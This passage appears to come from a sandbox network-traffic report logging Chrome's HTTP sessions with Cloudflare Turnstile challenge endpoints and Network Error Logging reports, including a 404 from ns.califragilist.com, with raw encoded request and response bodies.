                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:38 UTC1149OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/985987479:1730906859:VmyJFIL_Fq-MDv0sVVlGF-GoqYDiNITe2QXZJkrSh1A/8de644ce9b5745f6/10XP31l6VDq4aRF.l1vMbr2zWTHPyEyeCAoXvvvIE4s-1730908536-1.1.1.1-Hrda3SJhqm_EvUItSZWiY949ZTsoMWuaNLstz2Q8bvDRQiF19YNK.kkAtQW9f0js HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Content-Length: 3042
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              CF-Challenge: 10XP31l6VDq4aRF.l1vMbr2zWTHPyEyeCAoXvvvIE4s-1730908536-1.1.1.1-Hrda3SJhqm_EvUItSZWiY949ZTsoMWuaNLstz2Q8bvDRQiF19YNK.kkAtQW9f0js
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6d6nj/0x4AAAAAAAxa-jBUtWqCblw0/auto/fbE/normal/auto/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:38 UTC3042OUTData Raw: 76 5f 38 64 65 36 34 34 63 65 39 62 35 37 34 35 66 36 3d 44 78 69 42 34 42 64 42 74 42 53 42 4a 42 5a 73 67 4f 73 67 34 71 61 34 61 45 31 38 61 31 67 61 71 7a 45 4d 78 6a 67 35 7a 67 63 71 63 4d 55 69 61 54 63 7a 47 72 64 67 4d 59 30 42 67 34 4c 6d 57 67 55 36 6a 61 52 67 53 71 31 45 58 72 75 67 31 57 67 33 6a 61 35 64 63 67 71 61 53 67 68 42 74 45 75 54 67 63 53 67 36 42 70 4d 74 65 75 67 61 5a 46 74 25 32 62 4a 5a 45 6c 54 78 45 71 31 5a 4c 2b 58 6a 67 36 71 67 63 72 43 69 54 75 67 42 6a 67 70 66 73 65 77 50 5a 76 67 47 77 4d 67 61 59 35 74 69 78 4b 69 69 34 67 66 45 36 67 35 75 72 55 6e 53 4f 45 2d 4e 69 67 2d 42 71 67 65 42 74 64 53 64 4b 78 67 74 69 57 65 66 74 54 67 63 38 6e 65 65 42 39 75 6a 67 35 67 69 78 34 75 4c 73 4a 67 69 69 67 43 75 61 4b 42
                                                                                                                                              Data Ascii: v_8de644ce9b5745f6=DxiB4BdBtBSBJBZsgOsg4qa4aE18a1gaqzEMxjg5zgcqcMUiaTczGrdgMY0Bg4LmWgU6jaRgSq1EXrug1Wg3ja5dcgqaSghBtEuTgcSg6BpMteugaZFt%2bJZElTxEq1ZL+Xjg6qgcrCiTugBjgpfsewPZvgGwMgaY5tixKii4gfE6g5urUnSOE-Nig-BqgeBtdSdKxgtiWeftTgc8neeB9ujg5gix4uLsJgiigCuaKB
                                                                                                                                              2024-11-06 15:55:38 UTC747INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:38 GMT
                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                              Content-Length: 149740
                                                                                                                                              Connection: close
                                                                                                                                              cf-chl-gen: SZbxxnFixhfctBONprJ6rzH42yQjVT++PPhzXViL2dpSc7dyKzsAZVMI/jvoCGhVSeuKquiAeryLAo2SjJN7zuCi4q3MQHeocA3B4i9irE1i7hnR5vykBMUhEIlpZncciGb1VjPwNfXnsyHeDEhfZjZ+OhA5QSamKQOm+UZ6gJSJEDMTMsU73HRqk6lbCgPVRT75Z6pvKwGmxXuaGpz/OuhchSpRDQbjyrmQ4FS980fV0H9vtBNfsZ5qL/J9TMkckUETnP58/jU6hVL3F6mmxnjUjGS1HYBx2zf0eOWH0su8OjdJfqzyIvSyS7v23oTBy/8PfVrHlYoBRarqhrXDIZ3D7iKXg0gffQ44Nm/JjW0eZZLdYGCQmA7xx7c0XgHTOJgRvcbB8otU3NEDGZHV465RJRzpDaOgptuIgykdTiVysv8a30rGIT+bQqIxPTfte9xNcvECNwqzIeUiXqT8XGyc3b+jtbSKG+AV+jW61IjweKo=$tzFsIbSyBLbNkaE/
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de644dbde403abe-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              2024-11-06 15:55:38 UTC622INData Raw: 70 4a 65 32 77 37 6d 43 78 6f 61 42 68 71 4f 2b 77 4b 72 41 6c 6f 6d 4b 6b 35 47 59 32 62 53 63 31 63 2b 7a 7a 36 7a 45 77 35 2f 63 70 37 2f 59 78 4f 6a 6d 32 38 71 77 34 62 33 54 30 63 4c 46 37 66 6e 76 77 75 53 79 36 4d 2f 6f 34 4e 4c 32 30 66 58 43 42 4e 33 5a 77 67 77 4b 41 77 58 41 79 41 6f 4d 45 42 50 66 30 64 37 70 7a 2b 6b 55 38 77 37 35 30 50 50 39 47 74 37 32 34 2f 55 51 2b 69 6f 43 46 50 34 74 44 69 66 39 4d 53 7a 6b 44 43 67 75 38 77 76 32 4b 41 77 4f 46 66 77 53 43 42 34 36 2f 42 63 44 4a 6b 51 61 53 55 67 42 48 6b 31 45 54 69 59 2b 50 7a 30 4e 44 43 46 4c 46 46 51 6b 57 31 73 6c 4f 68 45 38 49 42 68 6a 57 31 59 59 5a 6b 42 71 59 43 6c 45 4f 43 55 73 50 47 4a 53 4b 30 63 73 62 46 64 6b 62 58 64 6d 52 33 4e 56 4f 31 6f 2f 56 33 59 38 58 6c 46
                                                                                                                                              Data Ascii: pJe2w7mCxoaBhqO+wKrAlomKk5GY2bSc1c+zz6zEw5/cp7/YxOjm28qw4b3T0cLF7fnvwuSy6M/o4NL20fXCBN3ZwgwKAwXAyAoMEBPf0d7pz+kU8w750PP9Gt724/UQ+ioCFP4tDif9MSzkDCgu8wv2KAwOFfwSCB46/BcDJkQaSUgBHk1ETiY+Pz0NDCFLFFQkW1slOhE8IBhjW1YYZkBqYClEOCUsPGJSK0csbFdkbXdmR3NVO1o/V3Y8XlF
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 70 32 66 6e 4e 79 58 35 47 5a 6e 58 61 57 70 46 6d 58 64 4b 69 4c 67 58 31 34 62 6f 4e 39 6f 58 2b 76 68 61 75 75 62 37 65 52 74 6e 68 39 6a 58 47 49 64 37 72 42 6b 35 2b 43 75 4b 57 70 70 73 58 4a 69 35 2f 43 6f 5a 79 4f 7a 59 61 2b 72 61 37 57 31 71 37 4b 73 4d 79 5a 7a 61 43 59 71 73 43 34 72 65 4f 79 79 4d 44 59 71 36 76 5a 35 36 47 73 73 4b 54 65 38 4e 33 4c 2b 4e 6e 56 79 37 57 38 79 65 37 4e 2f 4e 6e 7a 2f 72 30 47 30 67 50 41 31 73 72 46 79 38 77 47 33 66 72 6b 46 4e 37 39 36 2b 72 54 42 52 6e 53 30 65 7a 57 47 76 62 74 49 2b 45 66 4a 68 51 46 48 64 37 67 35 68 59 64 2b 2b 41 62 4d 42 72 70 49 51 55 32 38 53 49 49 42 44 6b 6f 43 79 34 39 4c 41 34 79 51 54 41 5a 4e 6b 55 30 48 44 70 4a 4f 42 38 2b 54 54 77 69 51 6c 46 41 51 30 5a 56 52 45 5a 4c 57
                                                                                                                                              Data Ascii: p2fnNyX5GZnXaWpFmXdKiLgX14boN9oX+vhauub7eRtnh9jXGId7rBk5+CuKWppsXJi5/CoZyOzYa+ra7W1q7KsMyZzaCYqsC4reOyyMDYq6vZ56GssKTe8N3L+NnVy7W8ye7N/Nnz/r0G0gPA1srFy8wG3frkFN796+rTBRnS0ezWGvbtI+EfJhQFHd7g5hYd++AbMBrpIQU28SIIBDkoCy49LA4yQTAZNkU0HDpJOB8+TTwiQlFAQ0ZVREZLW
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 41 64 4a 43 44 64 61 64 7a 6f 5a 39 68 6f 32 79 69 67 49 4b 65 72 48 79 6a 74 6e 56 33 6c 4a 56 32 70 61 57 4c 63 4b 71 34 71 58 6d 77 6c 63 57 42 73 62 61 54 79 4c 65 35 76 73 7a 4c 6d 4b 6d 51 76 64 43 74 6a 37 65 57 30 4a 61 34 72 4b 62 4c 78 38 47 72 7a 39 2f 42 74 64 50 42 76 63 58 53 79 74 66 42 32 4e 65 77 32 39 4c 67 74 4c 54 4f 35 72 69 34 30 75 36 38 76 4e 62 32 77 4d 44 61 41 4e 66 5a 34 2f 63 47 38 75 73 42 78 76 6f 45 43 51 59 48 79 64 2f 6a 39 65 76 72 32 4e 66 61 36 75 6b 64 45 75 34 54 43 2f 45 55 39 68 6e 2b 32 51 62 31 42 41 67 61 41 67 63 5a 49 44 41 4b 42 77 49 30 48 77 38 4f 4c 43 63 73 44 68 66 31 50 78 59 75 46 53 55 61 2f 66 34 62 51 41 63 54 48 55 4e 45 50 6b 45 71 52 55 52 45 44 79 64 50 53 42 56 54 4c 7a 49 54 57 6b 63 32 48 47
                                                                                                                                              Data Ascii: AdJCDdadzoZ9ho2yigIKerHyjtnV3lJV2paWLcKq4qXmwlcWBsbaTyLe5vszLmKmQvdCtj7eW0Ja4rKbLx8Grz9/BtdPBvcXSytfB2New29LgtLTO5ri40u68vNb2wMDaANfZ4/cG8usBxvoECQYHyd/j9evr2Nfa6ukdEu4TC/EU9hn+2Qb1BAgaAgcZIDAKBwI0Hw8OLCcsDhf1PxYuFSUa/f4bQAcTHUNEPkEqRUREDydPSBVTLzITWkc2HG
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 63 36 69 58 66 70 32 73 6d 34 47 68 73 4a 2b 69 70 62 53 6a 70 61 71 34 74 34 53 56 66 4b 6d 38 6d 58 75 6a 67 72 79 43 70 4d 4f 37 71 70 75 33 78 36 79 6a 6b 4c 75 36 72 70 53 55 72 72 53 59 6d 4c 4b 38 6e 4a 79 32 79 36 6d 36 73 74 2f 45 7a 65 48 50 70 65 48 6f 74 4f 6a 47 79 73 47 6e 7a 61 79 71 34 64 54 79 38 75 32 76 37 50 4c 33 32 37 6a 67 73 74 33 56 39 4d 54 45 39 38 50 43 36 73 66 6e 31 77 44 6a 41 75 2f 66 43 39 44 50 2f 73 77 4b 32 41 37 75 43 65 34 55 32 65 63 56 41 43 54 30 37 77 37 32 4b 4f 44 68 34 77 58 6c 44 51 6b 6a 34 69 76 38 49 4f 59 4d 4b 43 6f 50 45 44 77 79 44 2f 30 34 39 30 45 36 2b 44 55 36 50 52 38 65 4b 42 77 33 42 43 42 44 4f 56 41 4d 4a 44 39 42 55 68 49 77 52 69 64 4c 4f 69 73 54 52 78 55 33 59 6a 38 6a 58 55 35 48 47 56 31
                                                                                                                                              Data Ascii: c6iXfp2sm4GhsJ+ipbSjpaq4t4SVfKm8mXujgryCpMO7qpu3x6yjkLu6rpSUrrSYmLK8nJy2y6m6st/EzeHPpeHotOjGysGnzayq4dTy8u2v7PL327jgst3V9MTE98PC6sfn1wDjAu/fC9DP/swK2A7uCe4U2ecVACT07w72KODh4wXlDQkj4iv8IOYMKCoPEDwyD/0490E6+DU6PR8eKBw3BCBDOVAMJD9BUhIwRidLOisTRxU3Yj8jXU5HGV1
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 6e 69 6f 6d 72 4f 31 6e 33 4b 71 74 4b 57 59 65 48 4f 37 70 72 2b 39 76 37 71 68 76 62 36 55 67 37 79 71 71 49 69 47 70 35 79 4c 7a 4c 72 47 6b 5a 7a 50 77 4b 71 68 31 36 7a 61 32 4e 76 57 78 39 50 65 6e 73 37 6c 33 4d 57 39 79 63 71 6a 31 71 62 48 77 65 4c 6f 32 75 62 55 70 74 33 71 74 4b 72 61 32 65 66 78 75 2f 4c 55 36 74 2f 73 74 66 37 39 2f 51 48 42 41 77 48 35 32 77 58 6a 37 76 37 64 7a 76 41 4b 7a 74 41 55 34 64 54 76 36 50 76 32 36 52 62 79 41 78 54 65 47 78 33 64 41 65 41 42 43 76 30 6a 33 78 73 63 4a 50 6e 74 43 69 34 77 45 41 41 6f 4b 66 41 58 4a 66 6f 31 4b 53 33 2b 46 52 59 67 2b 7a 51 59 50 7a 59 70 43 7a 34 63 4f 45 42 49 4b 51 74 56 4a 77 68 4f 51 53 38 30 4c 30 64 48 4b 30 34 34 50 79 39 53 52 45 4d 7a 56 6b 68 4b 61 47 56 4a 57 6d 34 74
                                                                                                                                              Data Ascii: niomrO1n3KqtKWYeHO7pr+9v7qhvb6Ug7yqqIiGp5yLzLrGkZzPwKqh16za2NvWx9Pens7l3MW9ycqj1qbHweLo2ubUpt3qtKra2efxu/LU6t/stf79/QHBAwH52wXj7v7dzvAKztAU4dTv6Pv26RbyAxTeGx3dAeABCv0j3xscJPntCi4wEAAoKfAXJfo1KS3+FRYg+zQYPzYpCz4cOEBIKQtVJwhOQS80L0dHK044Py9SREMzVkhKaGVJWm4t
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 39 33 67 6e 4f 34 71 49 6d 56 71 34 6d 35 76 49 47 7a 74 70 50 48 67 38 43 49 67 4a 57 4c 6f 38 2b 62 79 63 65 6a 6e 37 4c 45 71 62 57 71 6c 64 50 62 73 34 2b 55 6d 4e 69 31 6e 4b 75 69 6e 62 65 6a 74 4e 75 7a 79 75 48 72 75 4b 32 71 75 73 48 4f 31 4f 61 30 38 76 43 79 78 75 62 59 72 39 4c 4a 74 2b 44 63 2f 75 2f 51 31 39 73 46 39 63 62 6a 2b 50 58 4e 43 4f 50 4c 35 67 2f 6a 45 65 30 44 45 68 50 79 46 67 6e 33 47 52 7a 39 46 78 58 72 4a 43 4c 38 41 65 41 45 47 77 33 72 2b 41 34 74 4b 53 73 42 44 53 76 78 42 44 6b 55 45 52 77 51 43 67 6b 34 43 77 6f 55 45 42 34 69 50 6b 45 77 4d 79 67 6e 54 55 68 43 54 7a 74 4c 4b 52 74 55 52 6a 39 44 4c 55 78 44 56 69 64 4d 4f 43 6f 35 50 6b 70 52 52 55 39 6e 55 47 4e 68 50 55 46 46 59 79 6f 38 63 55 78 4a 56 45 68 43 51
                                                                                                                                              Data Ascii: 93gnO4qImVq4m5vIGztpPHg8CIgJWLo8+bycejn7LEqbWqldPbs4+UmNi1nKuinbejtNuzyuHruK2qusHO1Oa08vCyxubYr9LJt+Dc/u/Q19sF9cbj+PXNCOPL5g/jEe0DEhPyFgn3GRz9FxXrJCL8AeAEGw3r+A4tKSsBDSvxBDkUERwQCgk4CwoUEB4iPkEwMygnTUhCTztLKRtURj9DLUxDVidMOCo5PkpRRU9nUGNhPUFFYyo8cUxJVEhCQ
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 39 6d 4b 68 35 72 48 69 75 78 5a 6d 5a 6e 34 62 49 71 63 65 45 79 72 36 58 71 63 57 61 72 59 7a 46 30 72 2b 4b 71 38 36 73 75 4a 61 70 75 35 6d 54 71 36 2b 2b 30 75 54 64 30 75 4c 45 6f 38 43 6b 70 2b 71 76 36 4f 33 30 79 4e 57 7a 72 75 6d 31 35 72 66 55 33 65 6a 76 74 39 37 67 2b 64 4c 6b 41 77 44 34 2f 4e 50 37 78 41 33 59 2b 63 4c 69 79 2b 54 77 31 66 66 52 31 77 6a 61 47 41 66 32 45 42 37 30 47 4e 76 64 46 67 63 46 35 51 48 6b 42 78 72 6a 43 77 30 6d 2f 68 45 76 4b 79 72 39 4e 69 6a 77 4f 51 55 6d 37 67 2f 33 45 52 30 43 4a 50 30 45 4e 41 64 45 4d 79 4d 38 53 69 46 45 43 41 70 43 4d 7a 45 53 4c 52 45 7a 52 68 41 33 4f 56 49 72 50 56 74 58 56 69 70 69 56 42 31 6c 4d 56 59 6f 58 53 5a 72 4a 6c 63 36 54 47 74 77 4d 44 46 51 50 6e 52 52 56 6e 6c 6c 52 44
                                                                                                                                              Data Ascii: 9mKh5rHiuxZmZn4bIqceEyr6XqcWarYzF0r+Kq86suJapu5mTq6++0uTd0uLEo8Ckp+qv6O30yNWzrum15rfU3ejvt97g+dLkAwD4/NP7xA3Y+cLiy+Tw1ffR1wjaGAf2EB70GNvdFgcF5QHkBxrjCw0m/hEvKyr9NijwOQUm7g/3ER0CJP0ENAdEMyM8SiFECApCMzESLREzRhA3OVIrPVtXVipiVB1lMVYoXSZrJlc6TGtwMDFQPnRRVnllRD
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 6b 59 36 43 77 61 61 53 6f 37 6d 72 6c 36 69 47 72 4a 2f 49 70 4b 4b 50 6a 71 36 51 6b 37 43 32 75 5a 65 7a 76 72 72 67 79 74 71 38 75 39 66 47 74 37 36 38 77 64 54 69 74 37 66 4f 7a 64 48 6f 76 72 53 73 72 64 62 73 77 38 2f 4a 79 50 66 4b 79 64 50 50 33 65 48 39 41 65 2f 30 38 65 44 32 79 73 30 4c 37 73 76 52 78 41 6e 70 31 65 30 51 43 65 49 59 45 52 55 66 33 42 6e 73 2b 69 50 63 46 68 72 69 4a 67 48 32 45 2b 6a 37 39 53 7a 6f 48 43 77 52 4b 76 49 4a 38 76 41 58 45 41 55 78 42 66 63 54 48 2f 30 31 50 51 41 55 52 66 35 46 4a 30 6b 32 50 53 78 4f 4f 77 6f 74 43 30 30 6e 49 7a 55 57 54 43 39 4e 4b 45 59 79 58 42 31 67 48 54 59 7a 49 6a 52 6b 59 45 4e 55 50 6c 64 6b 4b 32 56 76 57 44 30 36 4d 46 4a 78 51 6b 46 47 53 54 70 51 57 33 56 74 65 6a 35 35 66 30 39
                                                                                                                                              Data Ascii: kY6CwaaSo7mrl6iGrJ/IpKKPjq6Qk7C2uZezvrrgytq8u9fGt768wdTit7fOzdHovrSsrdbsw8/JyPfKydPP3eH9Ae/08eD2ys0L7svRxAnp1e0QCeIYERUf3Bns+iPcFhriJgH2E+j79SzoHCwRKvIJ8vAXEAUxBfcTH/01PQAURf5FJ0k2PSxOOwotC00nIzUWTC9NKEYyXB1gHTYzIjRkYENUPldkK2VvWD06MFJxQkFGSTpQW3Vtej55f09
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 70 65 70 6d 4c 32 50 6d 36 65 79 79 36 61 71 76 71 6e 48 6c 70 53 56 32 36 2f 54 32 74 32 77 75 38 75 66 33 63 4b 77 30 71 58 42 34 38 72 75 34 61 75 36 78 66 4b 39 7a 73 43 6f 38 2b 37 45 7a 75 6a 64 33 62 76 76 74 74 2f 71 79 37 2f 4f 42 76 73 42 2b 2b 44 30 39 67 67 4a 34 65 6a 51 43 42 54 6d 7a 78 59 4e 42 77 7a 76 45 76 76 6e 42 79 44 62 43 39 67 65 31 68 72 36 46 51 6f 5a 34 76 4d 68 44 66 6b 42 2b 66 30 4b 44 66 41 6d 39 76 59 69 38 7a 49 48 4a 77 73 39 4d 78 41 55 43 78 34 46 52 67 51 54 48 53 59 59 4e 78 34 5a 44 30 45 64 4a 41 70 51 51 52 42 4b 4c 6c 63 51 4b 6c 68 63 56 6c 38 6f 4f 6c 56 52 50 6d 5a 57 59 31 41 62 51 6a 70 71 4f 45 55 35 54 6b 51 79 51 47 30 39 52 33 4e 4b 61 54 64 34 5a 6e 46 62 53 33 4a 52 63 48 56 79 59 58 5a 42 56 6c 64 49
                                                                                                                                              Data Ascii: pepmL2Pm6eyy6aqvqnHlpSV26/T2t2wu8uf3cKw0qXB48ru4au6xfK9zsCo8+7Ezujd3bvvtt/qy7/OBvsB++D09ggJ4ejQCBTmzxYNBwzvEvvnByDbC9ge1hr6FQoZ4vMhDfkB+f0KDfAm9vYi8zIHJws9MxAUCx4FRgQTHSYYNx4ZD0EdJApQQRBKLlcQKlhcVl8oOlVRPmZWY1AbQjpqOEU5TkQyQG09R3NKaTd4ZnFbS3JRcHVyYXZBVldI


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              38192.168.2.184978735.190.80.14432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:38 UTC535OUTOPTIONS /report/v4?s=w1RxPFelQCu0PdU74vtLhs%2FDGY48xdLJUX2eveSxk9zIslKi6XvmNzk5ALlpPKZJlZvYV2Ls86JP3a0woJTzolxDT2PRV0FB5rCU6hgUqDYoeClPh3ZuW5lP9Kocsg%3D%3D HTTP/1.1
                                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Origin: https://ns.califragilist.com
                                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:38 UTC336INHTTP/1.1 200 OK
                                                                                                                                              Content-Length: 0
                                                                                                                                              access-control-max-age: 86400
                                                                                                                                              access-control-allow-methods: OPTIONS, POST
                                                                                                                                              access-control-allow-origin: *
                                                                                                                                              access-control-allow-headers: content-type, content-length
                                                                                                                                              date: Wed, 06 Nov 2024 15:55:38 GMT
                                                                                                                                              Via: 1.1 google
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Connection: close


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              39192.168.2.184978835.190.80.14432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:39 UTC472OUTPOST /report/v4?s=w1RxPFelQCu0PdU74vtLhs%2FDGY48xdLJUX2eveSxk9zIslKi6XvmNzk5ALlpPKZJlZvYV2Ls86JP3a0woJTzolxDT2PRV0FB5rCU6hgUqDYoeClPh3ZuW5lP9Kocsg%3D%3D HTTP/1.1
                                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Content-Length: 434
                                                                                                                                              Content-Type: application/reports+json
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:39 UTC434OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 30 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 73 2e 63 61 6c 69 66 72 61 67 69 6c 69 73 74 2e 63 6f 6d 2f 37 50 58 55 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                                                                                                                                              Data Ascii: [{"age":0,"body":{"elapsed_time":606,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://ns.califragilist.com/7PXU/","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":404,"type":"http.error"},"type":"network-error
                                                                                                                                              2024-11-06 15:55:39 UTC168INHTTP/1.1 200 OK
                                                                                                                                              Content-Length: 0
                                                                                                                                              date: Wed, 06 Nov 2024 15:55:38 GMT
                                                                                                                                              Via: 1.1 google
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Connection: close


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              40192.168.2.1849789104.18.95.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:39 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/985987479:1730906859:VmyJFIL_Fq-MDv0sVVlGF-GoqYDiNITe2QXZJkrSh1A/8de644ce9b5745f6/10XP31l6VDq4aRF.l1vMbr2zWTHPyEyeCAoXvvvIE4s-1730908536-1.1.1.1-Hrda3SJhqm_EvUItSZWiY949ZTsoMWuaNLstz2Q8bvDRQiF19YNK.kkAtQW9f0js HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:39 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:39 GMT
                                                                                                                                              Content-Type: application/json
                                                                                                                                              Content-Length: 7
                                                                                                                                              Connection: close
                                                                                                                                              cf-chl-out: MdDY5lPLGJ8NXof53kYBHUBLHtH3dRxhF34=$5ISA1a28wFb5R5K2
                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de644e37f69e752-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              2024-11-06 15:55:39 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                              Data Ascii: invalid


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              41192.168.2.1849790104.18.94.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:39 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8de644ce9b5745f6/1730908538244/21b1b96677c9e3ef37b23fb885bf7ea9a1606ccafad54ff0890341b4aacd38a1/1Xp8Bu6WhlXmVxt HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6d6nj/0x4AAAAAAAxa-jBUtWqCblw0/auto/fbE/normal/auto/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:40 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:40 GMT
                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                              Content-Length: 1
                                                                                                                                              Connection: close
